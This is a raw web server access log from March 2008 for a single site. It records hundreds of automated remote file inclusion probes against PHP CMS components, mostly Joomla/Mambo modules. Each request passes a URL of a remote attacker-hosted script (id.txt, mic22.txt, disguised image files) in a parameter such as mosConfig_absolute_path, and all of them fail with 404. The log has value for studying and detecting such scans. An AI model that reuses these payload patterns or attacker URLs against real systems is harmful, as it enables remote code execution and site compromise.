87.230.15.10 - - [23/Mar/2008:08:32:39 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [23/Mar/2008:08:32:53 -0700] "GET /logs/access_080119.log/index.php?option=com_shambo2&Itemid=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [23/Mar/2008:08:32:54 -0700] "GET /index.php?option=com_shambo2&Itemid=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [23/Mar/2008:08:32:54 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:33:07 -0700] "GET /logs/access_080225.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:33:08 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:33:08 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:33:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:33:19 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:33:20 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:33:23 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:33:24 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:27 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:27 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:27 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:27 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:28 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:28 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:59 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:59 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:33:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:34:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.56.123 - - [23/Mar/2008:08:34:20 -0700] "GET /index.php?option=com_shambo2&Itemid=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:34:24 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:34:24 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:34:25 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.36.213.36 - - [23/Mar/2008:08:34:42 -0700] "GET /modifyform.html?code=http://www.fansvictorvaldes.es//components/com_rwcards/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:34:59 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.225.221.84 - - [23/Mar/2008:08:35:14 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [23/Mar/2008:08:35:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [23/Mar/2008:08:35:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:36:07 -0700] "GET /logs/access_080225.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:36:19 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:36:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:36:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:36:25 -0700] "GET /logs/access_080225.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:36:26 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:36:26 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:36:27 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:36:43 -0700] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:36:44 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:36:44 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:08:36:46 -0700] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:08:36:46 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:01 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:01 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:02 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:02 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:02 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:37:05 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:05 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:37:05 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:37:06 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:06 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:07 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:37:08 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:37:09 -0700] "GET /logs/access_071231.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:37:14 -0700] "GET /logs/access_071231.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:37:21 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:37:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:37:22 -0700] "GET /logs/access_080225.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:37:22 -0700] "GET /logs/access_080225.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:37:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:37:24 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:37:30 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:37:30 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:37:30 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:37:30 -0700] "GET /index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:37:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:37:30 -0700] "GET /logs/index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:37:39 -0700] "GET /logs/access_080223.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:37:40 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:37:41 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [23/Mar/2008:08:38:15 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /skin/zero_vote.php/skin=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /logs/skin/zero_vote.php/skin=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /logs/skin/zero_vote.php/skin=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /skin/zero_vote.php/skin=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /logs/skin/zero_vote.php/skin=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET /skin/zero_vote.php/skin=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:26 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:27 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:38:32 -0700] "GET /logs/access_080213.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:38:32 -0700] "GET /logs/access_080213.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:38:32 -0700] "GET /logs/access_080213.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:08:38:38 -0700] "GET /db.php?path_local=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:08:38:38 -0700] "GET /logs/db.php?path_local=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:38:44 -0700] "GET /logs/access_080225.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:38:49 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:39:09 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:39:18 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:39:18 -0700] "GET //skin/zero_vote/error.php?dir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:39:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.210.101.153 - - [23/Mar/2008:08:39:23 -0700] "GET /errors.php?error=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
207.210.101.153 - - [23/Mar/2008:08:39:23 -0700] "GET /logs/errors.php?error=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
89.111.176.28 - - [23/Mar/2008:08:39:25 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:39:50 -0700] "GET //errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
81.2.252.15 - - [23/Mar/2008:08:39:51 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.2.252.15 - - [23/Mar/2008:08:39:51 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.2.252.15 - - [23/Mar/2008:08:39:52 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:39:52 -0700] "GET /logs//errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
194.146.225.109 - - [23/Mar/2008:08:40:02 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:40:05 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:40:06 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:40:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:40:11 -0700] "GET /logs/access_080204.log/index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
